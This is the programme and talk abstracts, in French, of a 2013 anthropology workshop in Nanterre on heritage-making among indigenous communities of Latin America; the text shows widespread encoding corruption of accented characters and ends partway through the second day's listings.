ATELIER DE DA�MARRAGE FABRIQ’AM, les 23 et 24 mai 2013, LESC-MAE, Nanterre : rA�sumA�s des interventions

A�ATELIER DE DA�MARRAGE

carrA�

Laboratoire da��Ethnologie et de Sociologie ComparativeA�- Salle 308

Maison Ethnologie et ArchA�ologie RenA�-GinouvA?s

21, allA�e de la��UniversitA�

UniversitA� Paris Ouest Nanterre

Les 23 et 24 mai 2013

A�

DISCUTANTS EXTA�RIEURSA�

Anne-Christine Taylor (MusA�e du Quai Branly, EREA/LESC)

Nicolas Adell (UniversitA� de Toulouse,A�LISST/Centre d’Anthropologie Sociale)

Magali Demanget (UniversitA� de Montpellier 3, CERCE)

Anne-Marie Losonczy (CERMA/MONDESAM)

Jean-Louis Tornatore (IIAC/Lahic)

Cet atelier vise A� prA�ciser les thA�matiques du projet et les axes de comparaison entre les diffA�rents terrains. Il privilA�giera la discussion A� partir de prA�sentations courtes da��une pluralitA� de cas et perspectives. La��atelier est ouvert A� tous les intA�ressA�s, collA?gues et A�A�tudiants.

JEUDI 23 MAI

9h30A�: Accueil cafA�

10h :A�Introduction

Valentina Vapnarsky (CNRS, EREA/LESC)

MatinA�eA�: BASCULEMENTS SA�MANTIQUES DANS LES CONCEPTIONS ET DA�FINITIONS DU A�A� PATRIMOINE A�

10h15

MA�talangage A� culturel A� et rapport A� soi : de la��usage contemporain des termes espagnolsA�cultura, tradiciA?n et costumbre par les YurakarA� (piA�mont andin bolivien)

Vincent Hirtzel (EREA/LESC)

En me basant sur le corpus de donnA�es recueillies lors du projet de documentation linguistique DoBeS YurakarA� entre 2006 et 2011 comprenant environ 600 heures da��enregistrements audios et vidA�os traduits ou transcrits en espagnol, je propose un examen prA�liminaire de la��usage et des contextes da��occurrences des termes espagnols A�cultura A�, A� tradiciA?n A� et A� costumbre A� tels qua��ils sont employA�s par les yurakarA� aujourda��hui. Je ma��intA�resserai plus particuliA?rement aux situations A�nonciatives dans lesquels ces termes sont mobilisA�s, ce A� quoi ils rA�fA?rent, les liens sA�mantiques qui les unissent ou les distinguent, et chercherai A� dA�gager des pistes permettant de comprendre le type de rapport A� soi qua��ils servent A� mA�diatiser.

A�A�La coutumeA�A� et A�A�les coutumesA�A� en VO (chimane, piA�mont andin bolivien)

Isabelle Daillant (CNRS, EREA/LESC)

PlutA?t qua��A� la��emprunt da��un terme espagnol et A� ses usages, la prA�sentation sa��intA�ressera aux variations sA�mantiques que subit en chimane le terme yicdyea��, traduit de faA�on standard par costumbre. ObservA�es en synchronie auprA?s de Chimane dont la��intensitA� du contact avec la sociA�tA� nationale bolivienne a�� et en particulier avec ses reprA�sentants porteurs de rhA�torique patrimoniale a�� A�tait extrA?mement variable, ces variations traduisent de fait un changement qui sa��inscrit dans la mouvance gA�nA�rale de la patrimonialisation, ou du moins dans son antichambre folklorisante, mais aussi lA�gitimante.A�

Discussion

Pause

11h 30

La A� carte culturelle A� (mapa cultural) de leur territoire produite par les SuruA� A� la��aide de Google (Amazonie brA�silienne)

CA�dric Yvinec (LAS)

Les SuruA� ont produit avec l’aide d’organisations indigA�nistes et le soutien financier et technique de Google une A�carte culturelleA� informatisA�e, recensant sur leurs territoires actuels et historiques l’emplacement de divers lieux intA�ressantsA�: A�vA�nements mythologiques, A�vA�nements guerriers, anciens villages, ressources animales et vA�gA�tales, lieux justifiant des projets A�cologistes (reforestation, crA�dits carbone), lesquels sont dA�crits par des textes, des photos ou des vidA�os. Cette carte, disponible sur le site internet des SuruA� (paiter.org) et dans Google Earth, et les vidA�os parfois trA?s A�tranges (reconstituant en image de synthA?se des activitA�s traditionnelles) qui l’accompagnent, sont supposA�es promouvoir et dA�fendre la lutte des SuruA�, ou du moins de certaines factions SuruA�, pour une A�A�forA?tA�A�, une A�A�vieA�A� et mA?me une A�A�culture durablesA�A� (sustentaveis).

De la��intime au patrimon(d)ialA�: parcours da��objets matis (Amazonie brA�silienne)

Philippe Erikson (UPO, EREA/LESC)

Avant le contact, les Matis entretenaient avec certains objets un rapport des plus personnels, pour ne pas dire des plus intimes. ConsidA�rA�s comme de vA�ritables extensions de la personne, et donc difficilement aliA�nables, ces artefacts A�taient de ceux qu’on ne pouvait ni donner, ni prA?ter, ni mA?me, pour certains, ne serait-ce que montrer A� autrui. Tel A�tait le cas, par exemple, de leurs colliers, de leurs sarbacanes, de leurs masques ou encore des rA�cipients d’argile dans lesquels se stockent le curare. Or ces objets emblA�matiques des Matis font aujourd’hui l’objet d’un commerce effrA�nA�. Autrefois tenus de par soi, sinon tenus au secret, ils sont dA�sormais exhibA�s, filmA�s, troquA�s et/ou vendus en masse. AdmirA�s et convoitA�s aux quatre coins de la planA?te, ils ont incontestablement gagnA� sur le terrain de la valeur patrimon(d)iale. Mais A� quel prix pour les principaux intA�ressA�s?

Discussion

Pause dA�jeuner

AprA?s-midiA�: LES MODA?LES DE LA PATRIMONIALISATION PRODUITS PAR LES INSTITUTIONS : 1. DIVERSITA� DES ACTEURS

14h

AuthenticitA� et patrimoine immatA�rielA�: anthropologues, Unesco, communautA�s

Chiara Bortolotto (IIAC/Lahic)

La notion da��authenticitA� est la��une des plus controversA�es parmi celles utilisA�es dans la fabrique du patrimoine. Les diffA�rents acteurs qui interviennent dans le processus de mise en patrimoine mobilisent cette notion pour la critiquer, la refuser ou bien pour la valoriser. Dans cette communication je considA?re et compare les usages de ce concept faits par les diffA�rents acteurs impliquA�s dans la��institution du patrimoine culturel immatA�rielA�: les groupes porteurs des pratiques A� patrimonialiser, les anthropologues et la��Unesco. A� travers une ethnographie de la��institution, je compte montrer la place accordA�e A� cette notion dans les critA?res da��inscription aux Listes de la��Unesco. A� travers une analyse des dossiers de candidature des A�lA�ments inscrits sur les Listes de l’Unesco de 2009 A� 2012, il sa��agit da��expliciter les usages de ce concept tels qua��ils sont faits par les acteurs locaux et de les mettre en perspective avec ceux qu’en font (ou non) les anthropologues.

Quelle culture pour la thA�ologie de la��inculturationA�? Pastorale indigA?ne et A�A�patrimoine culturelA�A� dans le village nahua de La Esperanza, nord-est du Mexique

Anath Ariel de Vidas (CNRS, CERMA/ MONDESAM)

La A�A�pastorale indigA?neA�A� qui promeut la revitalisation des coutumes indiennes locales a commencA� A� opA�rer en 2004 dans le village nahua de La Esperanza au nord-est du Mexique. Elle met en marche un processus da��A�A�inculturationA�A�, fondement idA�ologique de la thA�ologie ou pastorale indigA?ne. Il sa��agit de placer Dieu dans une culture donnA�e et da��articuler avec celle-ci une thA�ologie chrA�tienne qui soit sensible au contexte local. Le A�A�dialogue inter-religieuxA�A�, initiA� par la��institution ecclA�siastique et repris par des catA�chistes locaux, tente ainsi de trouver dans les pratiques rituelles autochtones, considA�rA�es jusqua��alors par la��A�glise comme paA?ennes, des points de jonction. Ces efforts gA�nA?rent des adaptations, crA�ations mais aussi des revitalisations de certaines pratiques dA�laissA�es. En A�lucidant le type de nA�o-tradition crA�A�e par la pastorale indigA?ne dans le village de La Esperanza, on pourra mieux A�valuer, da��une part, la vision ecclA�siastique du patrimoine indigA?ne et, da��autre part, les limites de cette A�A�rA�conciliationA�A� avec la��A�glise.

Le cas du Centre historique de Mexico, un exemple des tensions entre conservation du patrimoine et gestion administrative

Paula LA?pez (CNRS, CERI/ Sciences Po)

Cette communication propose une radiographie du rA�seau da��acteurs participant au dA�veloppement du Centre Historique de Mexico et se concentre sur les relations et les tensions existantes entre les acteurs chargA�s de gA�rer le patrimoine et ceux chargA�s du dA�veloppement urbain. Il importe de comprendre cette organisation administrative et juridique car, au Mexique, elle est structurante du phA�nomA?ne A�A�patrimoineA�A� compris en termes politiques. En termes analytiques, il importe A�galement de comprendre la multiplicitA� de voix, intA�rA?ts, fonctions, acteurs qui agissent A� l’intA�rieur de l’A�tat.

La mise en scA?ne touristique des patrimoines culturels dans les communautA�s indigA?nes da��Amazonie A�quatorienneA�: entre stratA�gies et jeux da��acteurs

Julie Carpentier (EREA/LESC)

Cette prA�sentation aborde la question des jeux et des enjeux de la mise en scA?ne touristique dans les communautA�s indigA?nes da��Amazonie A�quatorienne. Depuis les annA�es 2000, la��activitA� touristique communautaire se dA�veloppe de maniA?re fulgurante. De nombreuses communautA�s souhaitent accueillir des touristes et gA�nA�rer ainsi des revenus complA�mentaires. Mais cette activitA� implique de se mettre en scA?ne, de donner A� voir au visiteur ce qua��il est venu chercher, de partager sa culture et de valoriser ses savoirs et savoir-faire. La danse, la musique, la��artisanat, le port da��habits traditionnels ou encore les pratiques chamaniques font partie des activitA�s proposA�es aux touristes. Ces activitA�s, souvent caractA�risA�es de A�A�folkloriquesA�A�, impliquent nA�anmoins un investissement important de la population, au sein duquel la A�A�cultureA�A� comme objet et mise en scA?ne de soi devient un enjeu central. On assiste A� un phA�nomA?ne de reconstruction, de rA�appropriation et souvent de rA�invention de pratiques culturelles paradoxalement prA�sentA�es comme A�A�authentiquesA�A�. Cette authenticitA� revendiquA�e participe nA�anmoins avant tout da��un imaginaire occidental constituA� da��idA�aux vA�hiculA�s au cours de la��histoire et instrumentalisA�s par les mA�dias. Une image que les indigA?nes, A� dA�faut da��en A?tre victimes, ont appris A� utiliser. Dans cette communication, il sa��agira donc, en sa��appuyant sur la��expA�rience de diffA�rents Centres de Tourisme Communautaire, de questionner ce phA�nomA?ne de mise en scA?ne touristique, en cherchant A� montrer en quoi le tourisme communautaire et le phA�nomA?ne de patrimonialisation qui la��accompagne, relA?vent da��un processus plus gA�nA�ralA�: il permet A� la population de gA�nA�rer des revenus pour amA�liorer ses conditions de vie et de participer A� un processus de rA�affirmation identitaire nA�cessaire A� la reconnaissance territoriale et politique sur la scA?ne nationale et internationaleA�; il permet A�galement aux acteurs institutionnels de justifier leurs politiques de dA�veloppement.

Discussion

Pause

AprA?s-midiA�: LES MODA?LES DE LA PATRIMONIALISATION PRODUITS PAR LES INSTITUTIONS : 2. LES ENJEUX POLITIQUES LOCAUX

16h30

Entre indigA�nisation et patrimonialisationA�: les tribulations du Mallku Tata Sabaya (communautA� aymara des hauts plateaux boliviens)

Gilles RiviA?re (CERMA/MONDESAM)

A� Sabaya, communautA� aymara des hauts-plateaux boliviens, un tableau est au cA�ur da��une configuration mythique et rituelle. Selon les spA�cialistes de la��iconographie coloniale, il reprA�sente Saint Martin de Tours. Pour les comunarios de Sabaya, il A�A�estA�A� le Tata Sabaya, associA� au volcan du mA?me nom, A�galement appelA� Pedro Martin Kapurata Kuntur Willka, ancA?tre et divinitA� tutA�laire dont les aventures et celles de son fils unijambiste sont contA�es dans un mythe qui situe divers lieux sacrA�s oA? se rA�unissent les autoritA�s traditionnelles (carguiris) pour les grands rituels communautaires. Les rituels sont rA�alisA�s sous la direction de l’autoritA� principale, le cacique ou A�A�chefA�A� des jilaqata (reprA�sentants des ayllu), incarnation du Mallku dont il porte le nom pendant l’annA�e que dure sa charge et qui, comme les wakas mieux connues pour l’A�poque coloniale, l’inspire et lui transmet son pouvoir. La fonction du corps des autoritA�s traditionnelles (ou Pusi Suyu) est d’assurer la prospA�ritA� collective, de garantir la reproduction animale et vA�gA�tale, et l’harmonie sociale et cosmique. Dans le cadre du projet Fabriq’am, il s’agit de faire l’histoire d’une image catholique, dA�tachA�e de son contexte da��origine, indigA�nisA�e et intA�grA�e aux reprA�sentations en rapport avec la��histoire du village et son identitA�. L’image du Tata Sabaya a aussi A�tA� reprise comme emblA?me par les leaders locaux d’une nouvelle organisation indigA?ne (COAJC) au cours des derniA?res annA�es. Cette rA�cupA�ration est la cause de divers conflits entre ces derniers et les autoritA�s traditionnelles. Nous verrons que les reprA�sentations des uns et des autres diffA?rent sensiblement quant A� la maniA?re de concevoir le rapport au passA� et A� l’ancA?tre tutA�laire devenu objet de patrimonialisation dans de nouveaux contextes (notamment lors du dA�filA� de l’Anata ou carnaval contestataire des organisations indigA?nes-paysannes, organisA� A� Oruro, capitale du dA�partement, une semaine avant l’Entrada, mondialement connue, accaparA�e par les A�lites blanches et mA�tisses).

De la��invisibilitA� A� la diffA�renciationA�: identitA�, identification et circulation entre catA�gories lA�gales en Amazonie brA�silienne

VA�ronique Boyer (CNRS, CERMA/MONDESAM)

Depuis les annA�es 1990, la mise en place de politiques publiques A�A�ciblA�esA�A� a favorisA� la��A�mergence de nouvelles formes de mobilisation politique. De nombreuses populations, demeurA�es jusque-lA� A�A�invisiblesA�A�, sa��organisent en effet A� prA�sent en tant que quilombolas ou indiens pour accA�der A� des droits, entre autres territoriaux. Dans ce contexte, des groupes de voisins, voire de parents, sa��emparant des instruments lA�gaux A� leur disposition, peuvent en venir A� dA�clarer des identitA�s ethniques diffA�rentes. Comme la��indiquent certaines rA�fA�rences bibliographies (Pantoja, Arruti par exemple) et le confirme la��enquA?te menA�e en Amazonie brA�silienne, ils peuvent mA?me sa��identifier successivement A� plusieurs catA�gories juridiques. Diverses questions se posent alorsA�: comment des groupes se constituent-ils comme des A�A�sujets politiquesA�A� ethnicisA�sA�? Quel travail symbolique et pratique sur eux-mA?mes doivent-ils alors opA�rer pour que leur demande soit recevable par la��A�tatA�? Comment apprA�hender enfin ces changements de catA�gorie lA�galeA�? RA�pondre A� ces questions suppose au prA�alable A�tablir ce que A�A�identitA�A�A� signifie pour eux. Le travail en cours permet da��A�tablir que les choix identitaires effectuA�s par les populations sont conA�us avant toute chose comme la��exercice da��un droit constitutionnel. Cette conception de la��A�A�identitA�A�A�, dA�cidA�e, pragmatique et mise en scA?ne, contraste avec celle des militants, davantage intimiste, ressentie et existentielle. Ca��est da��ailleurs peut-A?tre pourquoi ces derniers les accusent parfois da��A?tre trop A�A�mA�langA�sA�A�. Mais ca��est aussi pourquoi la�� A�A�identitA�A�A� est susceptible da��A?tre rA�orientA�e si nA�cessaire.

Mobiliser des ressources symboliques par delA� les frontiA?resA�: les A�A�nouvelles musiquesA�A� kali’na, entre Guyane et Suriname

GA�rard Collomb (CNRS, LAIOS)

Les Kalia��na orientaux sont installA�s de part et da��autre da��une frontiA?re nA�e de la��histoire coloniale (Guyane franA�aise / Suriname). Dans les villages le grand rituel epekotono, au coeur de la spiritualitA� et de la vie sociale, est a�� notamment a�� marquA� par le chant des hommes au tambour. Alors que disparaissaient les grands chanteurs classiques, de nouvelles formes musicales et de nouveaux espaces de performance sont apparus depuis une quinzaine d’annA�es. Certaines de ces musiques sa��inscrivent dans la continuitA� de la A�A�traditionA�A�, qui est alors revisitA�e en modifiant A� la marge rythmes et sonoritA�sA�; elles sont portA�es par de nouveaux groupes de chant au tambour, qui restent associA�s A� epekotono mais qui investissent aussi d’autres espaces et da��autres modes de performance (concert, festival, diffusion commerciale, Youtube et Facebook…). Da��autres groupes et da��autres chanteurs (mais aussi parfois les mA?mes) ont entrepris de faire A�voluer cette musique, qui est devenue un foyer da��influences diverses et un espace da��invention. Ces artistes se pensent dans la continuitA� da��un hA�ritage culturel kalia��na, assumA� et affirmA�, mais ils empruntent aussi aux mondes businengue et crA�oles, et mA?lent des sons venus des pA�riphA�ries urbaines de Paramaribo, des petites Antilles et de la JamaA?que, ou des banlieues des villes nA�erlandaises. Ces pratiques musicales ne reflA?tent pas une opposition A�A�tradition/modernitA�A�A�, elles sa��inscrivent dans un continuum, elles engagent A� des degrA�s divers la��intA�rieur et la��extA�rieur, la��hA�ritage patrimonial et la crA�ation, la��initiative propre et la mA�diation da��acteurs A�trangers, A� travers de nouveaux modes de performance qui impliquent le (re)modelage da��une image de soi. Elles ne sont pas seulement le lieu de constructions culturelles, ce sont aussi des A�A�prises de paroleA�A� participant da��un espace da��action politique qui vise A� dA�finir aujourda��hui un A�A�monde kalia��naA�A�, au sein de ces mondes sociaux complexes que sont la Guyane et le Suriname.

Discussion

Fin de journA�e

A�

VENDREDI 24 MAI

MatinA�e : CE QUI SE CONSERVE, SE TRANSMET OU S’OUBLIE : TRADITION ET HISTORICITA�

10h

La A�A�Farce des NA?gresA�A� du bas-TapajosA�: la trajectoire singuliA?re d’un rituel entre tradition et A�A�mise en patrimoineA�A�

Emilie Stoll (EPHE & UFPA)

Dans toute la rA�gion du bas-Amazone, des travaux ethnographiques ont dA�jA� dA�crit les FA?tes patronales (Festas de Santo) qui ont lieu, pendant dix jours, dans les communautA�s riveraines non-indigA?nes. La monographie da��Eduardo GalvA?o est sans doute la plus connue. Il y dA�peint, dans les annA�es 1940, les A�lA�ments constitutifs de la festivitA� de Saint BenoA�t la��Africain, organisA�e A� ItA? (foliA�es, mA?t da��abondance, bal dansant, etc.) ainsi que les implications politiques en termes de rivalitA� entre les confrA�ries. Dans le cadre da��une A�tude menA�e dans la rA�gion de SantarA�m (A�tat du ParA?, BrA�sil), ja��ai pu observer la��exA�cution de ces fA?tes le long du fleuve Arapiuns. Une spA�cificitA� locale rA�side nA�anmoins dans la phase de clA?ture de la fA?teA�: une A�A�Farce des NA?gresA�A� (Brincadeira dos Pretos) accompagne la mise A� bas du mA?t. Ce rituel, imbriquA� dans un autre, met en scA?ne une famille burlesque de Noirs (les acteurs sont dA�guisA�s) qui rA�alisent une sA�rie da��actes thA�A?tralisA�s renvoyant A� la��idA�e de fertilitA�. Or, de faA�on surprenante, les organisateurs de la fA?te ont depuis peu entamA� un processus da��ethnogenA?se et revendiquent une identitA� indigA?ne. La prA�sence saugrenue de cette A�A�FarceA�A� qui ne semble pas avoir sa place dans un village indigA?ne est le rA�sultat de couches mA�morielles implicites, parfois contradictoires, pouvant faire rA�fA�rence A� la��histoire de la rA�gionA�: les rA�ductions jA�suites, la prA�sence da��esclaves africains, les conflits armA�s de la Cabanagem, le cycle du caoutchouc et, plus rA�cemment, les revendications identitaires. TrA?s peu A�tudiA�, ce rituel dA�concertant a presque toujours A�tA� perA�u par les visiteurs comme une plaisanterie raciste. Pour ce motif, il avait A�tA� progressivement abandonnA�, voire camouflA� ou rA�duit au cercle intimiste du village. Plus rA�cemment, des efforts de valorisation du patrimoine immatA�riel des populations rurales de la rA�gion amazonienne ont contribuA� A� sa remise au goA�t du jour. La dynamique de transformation A� travers le temps paraA�t A?tre liA�e A� la��A�volution de la perception de sa signification par les acteurs externes. Entre la polyphonie des histoires et la multiplicitA� des registres, nous proposerons une lecture de la A�A�Farce des NA?gresA�A� de la��Arapiuns.

MaximA?n, A�lA�ment du patrimoine religieux des migrants guatA�maltA?ques aux A�tats-Unis

Sylvie PA�dron Colombani (UPO, EREA/LESC)

Au Guatemala, MaximA?n est un personnage religieux complexe nA� dans la��univers des confrA�ries catholiques de la��ouest du pays. Son culte, enracinA� dans la��histoire des populations indiennes locales, sa��est rA�cemment diffusA� dans le reste de la population, y compris parmi les couches urbaines et mA�tisses a��essentiellement sous la forme de San SimA?n, figure mA�tissA�e du personnage a��. Ce processus sa��est accompagnA� da��une A�A�mise en patrimoineA�A� particuliA?re. PrA�sent dans les musA�es, exhibA� dans les offices de tourisme, filmA� pour la tA�lA�vision A� certaines occasions, il apparaA�t aujourda��hui comme une divinitA� emblA�matique du Guatemala et surtout de ses racines indiennes mayas. Un ensemble de spA�cialistes religieux ont A�galement fait leur apparition afin de garantir la dimension A�A�mayaA�A� du culte. Le personnage est aussi entrA� dans des rA�seaux transfrontaliers, et des lieux de culte ont vu le jour dans des zones de migration privilA�giA�e des guatA�maltA?ques. Ca��est ainsi qua��on le retrouve par exemple dans la ville de Los Angeles oA? ja��ai commencA� A� travailler sur sa relocalisation et sur la��ensemble des transformations et re-significations qui la��ont accompagnA�e. Des fA?tes A� caractA?re public ont A�tA� mises en place a��rA�unissant des migrants issus de diffA�rents pays centramA�ricainsa�� dans lesquelles San SimA?n apparaA�t comme un A�lA�ment clA� de leur patrimoine. Ca��est ce processus de construction da��un patrimoine religieux et culturel autour du personnage qui sera A�tudiA�. Quels en sont les acteurs, les pratiques, les discours qui le lA�gitimenta��A�?.

Faire la��histoire A� Aguacatenango (Chiapas, Mexique)A�: rA�flexions sur les rA�gimes da��historicitA� et de temporalitA�

Marie Chosson (EREA/LESC)

Cette prA�sentation traitera des enjeux et de la forme que prend la nA�cessitA� actuelle de A�A�faire l’histoireA�A� dans la communautA� villageoise d’Aguacatenango, un village maya tseltal du Chiapas au Mexique. Celle-ci a connu, ces derniA?res annA�es, de nombreux bouleversements gA�nA�rateurs de conflits, A� l’image du processus de diversification religieuse, vA�cu comme une dislocation communautaire par les catholiques traditionalistes mais aussi de la volontA� d’acquA�rir une indA�pendance administrative, sous la forme d’une municipalisation. Ce contexte particulier amA?ne les acteurs A� de multiples interrogations quant A� ce qu’ils considA?rent comme les critA?res dA�finissant leur identitA�, les obligeant A� mobiliser la mA�moire de leur A�A�traditionA�A�, dans les pratiques et discours, pour penser leur communautA� dans la continuitA� et rA�affirmer un systA?me de valeurs et de reprA�sentations partagA�es. Cette dA�marche rA�flexive inclut une rA�activation des connaissances et de la mA�moire collective de l’histoire du village, que ces acteurs m’ont demandA� de recueillir et de compiler pour eux, aussi bien par le biais du recueil des rA�cits que par la consultation des archives locales. Au-delA� d’une simple compilation, ce recueil des rA�cits sur ce qui fait l’histoire du groupe villageois, permet de mettre en lumiA?re les modes d’A�laboration spA�cifique de l’histoire mais aussi les modalitA�s de transmission mA�morielle de ces rA�cits, qui sont composA�s dans des constructions discursives, dont les contraintes linguistiques, rhA�toriques et interactionnelles en font un genre particulier de la tradition orale. La mise en parallA?le, jusque-lA� inA�dite, de ces rA�cits de tradition orale et des informations retrouvA�es dans les archives permet, dans un second temps, de souligner la typification des A�vA�nements, distinguant ceux qui ont A�tA� A�A�dignesA�A� de mA�moire des autres, mais aussi ceux jugA�s fondateurs, ou au contraire, sources de crise dans le sentiment communautaire. De plus, les processus de manipulation de la A�A�traditionA�A�, par l’incorporation des nouveaux acteurs, donnent A� voir, par une autre approche, les rA�gimes de temporalitA� tel qu’ils sont conA�us par ce groupe villageois.

Discussion

Pause

11h30

De la construction d’un savoirA�: les enjeux de la transmission des priA?res chez les Tseltal (Chiapas, Mexique)

Helios Figuerola (EREA/LESC)

Parmi les spA�cialistes rituels tseltal de San Juan Cancuc (Hautes terres de la��A�tat du Chiapas au Mexique), la parole, A� travers les priA?res, se trouve au cA�ur de chaque opA�ration liA�e A� la��apprentissage des rituels. Sans ces priA?res, qui sont conA�ues comme une communication dialogique de la��homme avec les divinitA�s invoquA�es et dont il attend les signes cryptA�s des A�A�rA�ponsesA�A�, le prieur est inefficace et les impA�trants dA�semparA�s. Ce sont surtout les linguistes, moins les anthropologues, qui se sont intA�ressA�s A� la��A�tude des priA?res mayas, mais sans dA�velopper une comparaison au sein de celles-ci. Notre projet consiste donc A� soumettre un corpus prA�cis de priA?res tseltal A� un examen comparatif, afin de dA�gager tant leur structure interne que les critA?res taxinomiques qui en gouvernent la totalitA� et leur confA?rent la��efficacitA� recherchA�e par le spA�cialiste rituel. Nous nous efforcerons A�galement de faire ressortir les rA?gles mnA�motechniques de transmission de ces connaissances intangibles et de la patrimonialisation de ce savoir par les spA�cialistes rituels plus anciens, au dA�triment de leurs jeunes confrA?res dont ils ne reconnaissent pas la A�A�crA�ativitA�A�A� rituelle. Il sa��agit enfin da��examiner comment et pourquoi cette patrimonialisation est la��objet de convoitises intra-communautaires.

Les radins du rituelA�: la transmission contrA?lA�e du Javari chez les Trumai (Amazonie brA�silienne).

Emmanuel De Vienne (UPO, EREA/LESC)

Dans la sociA�tA� pluri-ethnique et plurilinguistique du Haut Xingu (Mato Grosso, Amazonie brA�silienne), la��intensitA� des A�changes en biens et en personnes na��empA?che pas une cristallisation aigA?e des identitA�s ethniques. Les relations entre les dix groupes qui la composent sont rA�gies par un fort principe de rivalitA�, qui a pour critA?re principal le rituel, A� la fois mA�diateur de la relation et objet A� exhiber. Les Trumai font ici figure de parents pauvres, puisqua��ils ont cessA� de participer aux fA?tes interethniques depuis une vingtaine da��annA�es. NA�anmoins, depuis deux ans, ils ont entrepris un lent travail de revitalisation qui porte notamment sur le Javari, fA?te de doubles funA�railles qua��ils ont apportA�e dans la rA�gion il y a deux siA?cles et qui est dA�sormais pratiquA�e par la��ensemble du Haut Xingu. En dA�pit de ce caractA?re partagA�, il sa��agit explicitement pour eux da��affirmer leur statut de A�A�maA�tresA�A� du rituel A� la��heure oA? leurs voisins cherchent A� le leur A�A�volerA�A�. On dA�crira dans cette prA�sentation les modalitA�s contemporaines de la transmission du savoir (musical et chorA�graphique), afin de comprendre le rA�gime de propriA�tA� intellectuelle qui sous-tend la��A�change rituel dans le Haut Xingu, et de mesurer leurs effets sur la dynamique ethnogA�nA�tique.

Ne pas A�A�penser/se souvenirA�A� pour patrimonialiser dans les Andes de Bolivie

Laurence Charlier (CERMA/ MONDESAM)

Mon enquA?te ethnographique se dA�roule dans la rA�gion du Nord-PotosA� bolivien. Lors de mon terrain, ja��ai accompagnA� deux jeunes hommes de la communautA� da��Urur Uma dA�terrer des momies prA�colombiennes. Ils voulaient les vendre A� un professeur des universitA�s de Llallagua lequel les revendait, selon eux, aux A�tats-Unis. Pour se prA�munir de la��A�ventuel courroux des momies excavA�es et pouvoir ainsi les patrimonialiser, ils me firent remarquer qua��il A�A�fallait ne pas y penser/ se souvenirA�A� (A�A�yuyayA�A� en quechua). Si on ne pense pas/ne se souvient pas que ces momies sont les ancA?tres, ces momies sont des marchandises, ca��est-A�-dire des os que la��on peut vendre aisA�ment et insA�rer dans diffA�rents circuits. Nous verrons que de ce processus patrimonialisant, A�merge une nouvelle modalitA� de construction mA�morielle fondA�e non plus sur la��activation de la pensA�e/mA�moire mais au contraire sur la��anti-pensA�e.

Discussion

Pause dA�jeuner

AprA?s-midiA�: LES BASCULEMENTS DANS LES CONCEPTIONS DU A� PATRIMOINE A�A�: IMAGES ET A�CRITURES

14h

De la modification du statut de la��image et de la A�A�fabricationA�A� da��artistes amA�rindiens chez les Huni Kuin Cashinahua et les Shipibo

Patrick Deshayes (EREA/LESC)

Il na��y avait, il y encore une trentaine da��annA�e chez les Huni Kuin, que deux types da��expression da��images, la��une figurative appelA�e damin et la��autre non figurative appelA� kene. Les kene A�taient les peintures corporelles ainsi que les peintures qui ornaient les objets rituels. Les damin A�taient les poupA�es mais aussi les dA�guisements. Les visions chamaniques pouvaient contenir des damin et des kene. Les damin sont les images-leurres envoyA�es par les espritsA�; les kene les images de comprA�hensions interprA�tA�s par les chamanes. GrA?ce ou A� cause de cette interprA�tation, le figuratif fut toujours considA�rA� comme moins A�A�vraiA�A� que le non figuratif. Le surgissement de la��A�criture ne posa pas trop de contradiction dans cette reprA�sentation visuelle puisque la��A�criture A� la��instar des kene est un graphisme qui donnait du sens. En revanche A� la��A�cole surgirent da��autres imagesA�: les photographies dans les livres mais aussi les dessins et les schA�mas. Les enfants dessinA?rentA�: le figuratif mA?me enfantin reprit une autre place. Il existe aujourda��hui des artistes peintres Huni Kuin qui revendiquent A�A�une peinture traditionnelle Huni KuinA�A�. Cette peinture est figurative. Comment cette transformation sa��est-elle faiteA�? Ces artistes se revendiquent aussi da��une forme de chamanisme. Comment cela se construit-ilA�? Chez les Shipibo, le dA�veloppement des artistes peintres existe depuis plusieurs dA�cennies, la��on y trouve une idA�e assez proche de celle des Huni Kuin quant aux statuts des kene. Les artistes peintres consomment des plantes rA�servA�es auparavant aux femmes qui avaient la��exclusivitA� de la peinture des poteries et les prenaient pour A�A�A?tre guidA�esA�A�. Par ailleurs, ces peintres prennent aussi la��ayahuasca des chamanes pour restituer leur vision sur des toilesa�� Enfin, de nombreux galeristes aujourda��hui ont achetA� ces peintures qua��ils nomment A�A�art ethniqueA�A�.

La��auto-ethnographie des peintres sur amatl du Guerrero (sud-ouest du Mexique)A�: des contextes transnationaux, locaux et communautaires de la patrimonialisation

Aline HA�mond (UniversitA� Paris 8, CREDAL)

Les processus de patrimonialisation en cours dans la��A�tat de Guerrero (sud-ouest du Mexique), sous la��A�tiquette de A�A�Guerrero, pueblo del tigreA�A�, visent A� crA�er une identitA� rA�gionale (ou patria chica), A� visA�es institutionnelles et politiques, qui touchent tout autant les produits culinaires (par exemple le mezcal El Tecuana��), artisanaux (masques des combattants jaguars du centre de la��A�tat), archA�ologiques (A�A�Temple du jaguarA�A� olmA?que de Teopantecuanitlana��) ou immatA�riels (danses, formes sociales liA�es A� la vie communautaire). Ils procurent un label pour permettre da��organiser un circuit autour des merveilles naturelles (grottes olmA?quesa��) et des A�A�traditions indigA?nesA�A� (OlinalA?, AcatlA?n, Zitlalaa��). Quelles sont les modifications ou modalitA�s stratA�giques de mise en valeur des identitA�s A�tablies par les propres A�A�indigA?nesA�A�, susceptibles da��A?tre des leviers pour le dA�veloppement touristique des terres intA�rieures? Dans un contexte dA�sormais interconnectA�, de quelle maniA?re les A�A�sujets de patrimonialisationA�A� interagissent-ils avec les institutions culturelles et politiques rA�gionales, locales et transnationales, dans des lieux qui sont par ailleurs caractA�risA�s par leur histoire politique de contestation et de rA�pressionA�? Je propose de sonder en particulier le cas da��auto-ethnographie opA�rA�e par les peintres sur amatl (papier da��A�corce) du Haut-Balsas. La patrimonialisation de leur culture et les rapports politiques locaux, en particulier A� travers leurs luttes de protestation, ont fait la��objet de nouveaux projets musA�aux post-coloniaux (Smithsoniana��s National Museum of American Indian, Whasington D.C.) et de mise en valeur de la culture A�A�mexicaineA�A� (National Museum of Mexican Art de la ville de Chicago).

Filmer pour A?tre vuA�: le visible et l’invisible culturel chez les Karaja d’Amazonie brA�silienne

Nathalie PA�tesch (EREA/LESC)

